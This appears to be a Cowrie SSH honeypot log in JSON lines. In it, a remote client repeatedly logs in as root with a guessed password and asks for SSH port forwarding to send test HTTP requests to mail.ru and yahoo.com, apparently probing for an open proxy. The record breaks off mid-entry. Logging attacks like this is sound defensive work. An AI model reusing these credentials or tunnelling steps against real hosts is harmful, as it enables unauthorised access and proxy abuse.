{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:23.234470Z","src_ip":"77.83.207.83","session":"a00b02146aac"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:23.484968Z","src_ip":"77.83.207.83","session":"a00b02146aac"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":27962,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:27962","sensor":"my-vps","timestamp":"2025-08-31T03:43:23.536014Z","session":"a00b02146aac"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:23.586319Z","src_ip":"77.83.207.83","session":"a00b02146aac"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":651,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:651","sensor":"my-vps","timestamp":"2025-08-31T03:43:23.728710Z","session":"a00b02146aac"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:23.779201Z","src_ip":"77.83.207.83","session":"a00b02146aac"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":14168,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:14168","sensor":"my-vps","timestamp":"2025-08-31T03:43:23.920779Z","session":"a00b02146aac"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:23.971050Z","src_ip":"77.83.207.83","session":"a00b02146aac"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:24.022174Z","src_ip":"77.83.207.83","session":"a00b02146aac"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":34331,"dst_ip":"1.2.3.4","dst_port":22,"session":"17f8c3db7e1a","protocol":"ssh","message":"New connection: 77.83.207.83:34331 (1.2.3.4:22) [session: 17f8c3db7e1a]","sensor":"my-vps","timestamp":"2025-08-31T03:43:24.071260Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:24.072158Z","src_ip":"77.83.207.83","session":"17f8c3db7e1a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:24.122589Z","src_ip":"77.83.207.83","session":"17f8c3db7e1a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46762,"dst_ip":"1.2.3.4","dst_port":22,"session":"68d333c1aaf0","protocol":"ssh","message":"New connection: 212.227.125.160:46762 (1.2.3.4:22) [session: 68d333c1aaf0]","sensor":"my-vps","timestamp":"2025-08-31T03:43:24.265847Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:24.374474Z","src_ip":"77.83.207.83","session":"17f8c3db7e1a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":17285,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:17285","sensor":"my-vps","timestamp":"2025-08-31T03:43:24.425855Z","session":"17f8c3db7e1a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:24.476588Z","src_ip":"77.83.207.83","session":"17f8c3db7e1a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":8774,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:8774","sensor":"my-vps","timestamp":"2025-08-31T03:43:24.621007Z","session":"17f8c3db7e1a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:24.671762Z","src_ip":"77.83.207.83","session":"17f8c3db7e1a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":28245,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:28245","sensor":"my-vps","timestamp":"2025-08-31T03:43:24.812926Z","session":"17f8c3db7e1a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:24.863543Z","src_ip":"77.83.207.83","session":"17f8c3db7e1a"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:24.915529Z","src_ip":"77.83.207.83","session":"17f8c3db7e1a"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":34398,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f75840b3481","protocol":"ssh","message":"New connection: 77.83.207.83:34398 (1.2.3.4:22) [session: 4f75840b3481]","sensor":"my-vps","timestamp":"2025-08-31T03:43:24.965208Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:24.975595Z","src_ip":"77.83.207.83","session":"4f75840b3481"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:25.015813Z","src_ip":"77.83.207.83","session":"4f75840b3481"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:25.265606Z","src_ip":"77.83.207.83","session":"4f75840b3481"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":11420,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:11420","sensor":"my-vps","timestamp":"2025-08-31T03:43:25.316739Z","session":"4f75840b3481"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:25.366896Z","src_ip":"77.83.207.83","session":"4f75840b3481"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":24948,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:24948","sensor":"my-vps","timestamp":"2025-08-31T03:43:25.508470Z","session":"4f75840b3481"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:43:25.534115Z","src_ip":"212.227.125.160","session":"68d333c1aaf0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:43:25.534903Z","src_ip":"212.227.125.160","session":"68d333c1aaf0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:25.558754Z","src_ip":"77.83.207.83","session":"4f75840b3481"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":27821,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:27821","sensor":"my-vps","timestamp":"2025-08-31T03:43:25.700387Z","session":"4f75840b3481"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:25.750513Z","src_ip":"77.83.207.83","session":"4f75840b3481"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:25.801713Z","src_ip":"77.83.207.83","session":"4f75840b3481"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":34467,"dst_ip":"1.2.3.4","dst_port":22,"session":"2abe9e3fd435","protocol":"ssh","message":"New connection: 77.83.207.83:34467 (1.2.3.4:22) [session: 2abe9e3fd435]","sensor":"my-vps","timestamp":"2025-08-31T03:43:25.850245Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:25.851480Z","src_ip":"77.83.207.83","session":"2abe9e3fd435"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:25.901351Z","src_ip":"77.83.207.83","session":"2abe9e3fd435"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:26.149719Z","src_ip":"77.83.207.83","session":"2abe9e3fd435"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":19191,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:19191","sensor":"my-vps","timestamp":"2025-08-31T03:43:26.200473Z","session":"2abe9e3fd435"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:26.250309Z","src_ip":"77.83.207.83","session":"2abe9e3fd435"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":3935,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:3935","sensor":"my-vps","timestamp":"2025-08-31T03:43:26.392195Z","session":"2abe9e3fd435"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:26.441991Z","src_ip":"77.83.207.83","session":"2abe9e3fd435"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":15878,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:15878","sensor":"my-vps","timestamp":"2025-08-31T03:43:26.584226Z","session":"2abe9e3fd435"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:26.634255Z","src_ip":"77.83.207.83","session":"2abe9e3fd435"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:26.685094Z","src_ip":"77.83.207.83","session":"2abe9e3fd435"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":34525,"dst_ip":"1.2.3.4","dst_port":22,"session":"1288ab13e476","protocol":"ssh","message":"New connection: 77.83.207.83:34525 (1.2.3.4:22) [session: 1288ab13e476]","sensor":"my-vps","timestamp":"2025-08-31T03:43:26.733973Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:26.734822Z","src_ip":"77.83.207.83","session":"1288ab13e476"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","h